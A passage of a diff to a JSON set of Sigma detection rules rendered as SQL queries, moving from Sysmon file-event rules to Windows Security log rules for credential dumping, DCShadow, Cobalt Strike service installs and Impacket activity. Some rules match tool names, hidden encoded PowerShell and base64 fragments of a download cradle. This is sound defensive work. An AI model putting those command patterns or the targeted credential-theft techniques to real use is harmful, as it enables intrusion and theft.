See the filename variable for more details on which file has been opened.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate microsoft diagcab" + "Legitimate used of encrypted ZIP files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\') AND NOT (TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_diagcab.yml" + "filename": "win_security_susp_opened_encrypted_zip.yml" }, { - "title": "BloodHound Collection Files", - "id": "02773bed-83bf-469f-b7ff-e676e7d78bab", - "status": "experimental", - "description": "Detects default file names outputted by the BloodHound collection tool SharpHound", - "author": "C.J. May", + "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", + "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "status": "test", + "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", + "author": "James Pemberton / @4A616D6573", "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.001", + "attack.t1136.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\_BloodHound.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\_computers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_containers.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_domains.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_gpos.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_groups.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_ous.json' ESCAPE '\\' OR TargetFilename LIKE '%\\_users.json' ESCAPE '\\') OR (TargetFilename LIKE '%BloodHound%' ESCAPE '\\' AND TargetFilename LIKE '%.zip%' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\pocket\\_containers.json' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" ], - "filename": "file_event_win_bloodhound_collection.yml" + "filename": "win_security_susp_local_anon_logon_created.yml" }, { - "title": "Octopus Scanner Malware", - "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "title": "Suspicious Access to Sensitive File Extensions", + "id": "91c945bc-2ad1-4799-a591-4d00198a1215", "status": "test", - "description": "Detects Octopus Scanner Malware.", - "author": "NVISO", + "description": "Detects known sensitive file extensions accessed on a network share", + "author": "Samir Bousseaden", 
"tags": [ - "attack.t1195", - "attack.t1195.001" + "attack.collection", + "attack.t1039" ], "falsepositives": [ - "Unknown" + "Help Desk operator doing backup or re-imaging end user machine or backup software", + "Users working with these data types or exchanging message files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_octopus_scanner.yml" + "filename": "win_security_susp_raccess_sensitive_fext.yml" }, { - "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", - "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", + "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", + "id": "f63508a0-c809-4435-b3be-ed819394d612", "status": "test", - "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", - "author": "Julia Fomina, oscd.community", + "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. 
This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" ], - "filename": "file_event_win_winrm_awl_bypass.yml" + "filename": "win_security_user_driver_loaded.yml" }, { - "title": "Suspicious File Created Via OneNote Application", - "id": "fcc6d700-68d9-4241-9a1a-06874d621b06", + "title": "Possible DC 
Shadow Attack", + "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "status": "experimental", - "description": "Detects suspicious files created via the OneNote application. This could indicate a potential malicious \".one\"/\".onepkg\" file was executed as seen being used in malware activity in the wild", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects DCShadow via create new SPN", + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1207" ], "falsepositives": [ - "False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote.", - "Occasional FPs might occur if OneNote is used internally to share different embedded documents" + "Valid on domain controllers; exclude known DCs" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenotem.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OneNote\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.chm' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.htm' ESCAPE '\\' OR TargetFilename LIKE '%.html' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID 
= '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" ], - "filename": "file_event_win_office_onenote_susp_dropped_files.yml" + "filename": "win_security_possible_dc_shadow.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum", - "id": "ad7085ac-92e4-4b76-8ce2-276d2c0e68ef", + "title": "DPAPI Domain Master Key Backup Attempt", + "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "status": "test", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S", + "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.t1003.004" ], "falsepositives": [ - "Unlikely" + "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." 
], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\physmem.sys%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\IME\\\\IMEJP\\\\imjpueact.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\IMTCPROT.DLL%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\imecpmeid.dll%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\spp\\\\ServiceState\\\\Recovery\\\\pac.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\cy-GB\\\\Setup\\\\SKB\\\\InputMethod\\\\TupTask.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\config\\\\config\\\\startwus.dat%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" ], - "filename": "file_event_win_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" }, { - "title": "GoToAssist Temporary Installation Artefact", - "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "title": "Credential Dumping Tools Service Execution - Security", + "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", "status": "test", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, 
and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "frack113", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "file_event_win_gotoopener_artefact.yml" + "filename": "win_security_mal_creddumper.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - File", - "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", + "title": "CobaltStrike Service Installations - Security", + "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe 
DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" ], - "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "win_security_cobaltstrike_service_installs.yml" }, { - "title": "Unusual File Modification by dns.exe", - "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "title": "Invoke-Obfuscation Via Stdin - Security", + "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", "status": "experimental", - "description": 
"Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" ], - "filename": "file_change_win_unusual_modification_by_dns_exe.yml" + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" }, { - "title": "File Creation Date Changed to Another Year", - "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", - "status": "experimental", - "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", - "author": "frack113, Florian Roth (Nextron Systems)", + "title": "Addition of SID History to Active Directory Object", + "id": "2632954e-db1c-49cb-9936-67d1ef1d17d2", + "status": "stable", + "description": "An attacker can use the SID history attribute to gain additional privileges.", + "author": "Thomas Patzke, @atc_project (improvements)", "tags": [ - "attack.t1070.006", 
- "attack.defense_evasion" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1134.005" ], "falsepositives": [ - "Changes made to or by the local NTP service" + "Migration of an account into a new domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4765', '4766') OR ((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" ], - "filename": "file_change_win_2022_timestomping.yml" + "filename": "win_security_susp_add_sid_history.yml" }, { - "title": "Potential PrintNightmare Exploitation Attempt", - "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", - "status": "experimental", - "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", - "author": "Bhabesh Raj", + "title": "Protected Storage Service Access", + "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "status": "test", + "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" ], - "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" + "filename": "win_security_protected_storage_service_access.yml" }, { - "title": "Unusual File Deletion by Dns.exe", - "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "title": "AD Privileged Users or Groups Reconnaissance", + "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", "status": "experimental", - "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch (Nextron Systems)", + "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Unknown" + "If source account name is not an admin then its super suspicious" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" 
+ "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" + "filename": "win_security_account_discovery.yml" }, { - "title": "Prefetch File Deleted", - "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "title": "Possible Impacket SecretDump Remote Activity", + "id": "252902e3-5830-4cf6-bf21-c22083dfd5cf", "status": "experimental", - "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", - "author": "Cedric MAURUGEON", + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "author": "Samir Bousseaden, wagga", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' 
AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_prefetch.yml" + "filename": "win_security_impacket_secretdump.yml" }, { - "title": "File Deleted Via Sysinternals SDelete", - "id": "6ddab845-b1b8-49c2-bbf7-1a11967f64bc", + "title": "Metasploit SMB Authentication", + "id": "72124974-a68b-4366-b990-d30e0b2a190d", "status": "test", - "description": "Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Alerts on Metasploit host's authentications on the domain.", + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Legitime usage of SDelete" + "Linux hostnames composed of 16 characters." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.AAA' ESCAPE '\\' OR TargetFilename LIKE '%.ZZZ' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\Wireshark\\\\radius\\\\dictionary.alcatel-lucent.aaa' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" ], - "filename": "file_delete_win_sysinternals_sdelete_file_deletion.yml" + "filename": "win_security_metasploit_authentication.yml" }, { - "title": "Backup Files Deleted", - "id": "06125661-3814-4e03-bfa2-1e4411c60ac3", + "title": "Possible Shadow Credentials Added", + "id": "f598ea0c-c25a-4f72-a219-50c44411c791", "status": "experimental", - "description": "Detects deletion of files with extensions often used for backup 
files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.", - "author": "frack113", + "description": "Detects possible addition of shadow credentials to an active directory object.", + "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.credential_access", + "attack.t1556" ], "falsepositives": [ - "Legitime usage" + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.VHD' ESCAPE '\\' OR TargetFilename LIKE '%.bac' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.wbcat' ESCAPE '\\' OR TargetFilename LIKE '%.bkf' ESCAPE '\\' OR TargetFilename LIKE '%.set' ESCAPE '\\' OR TargetFilename LIKE '%.win' ESCAPE '\\' OR TargetFilename LIKE '%.dsk' 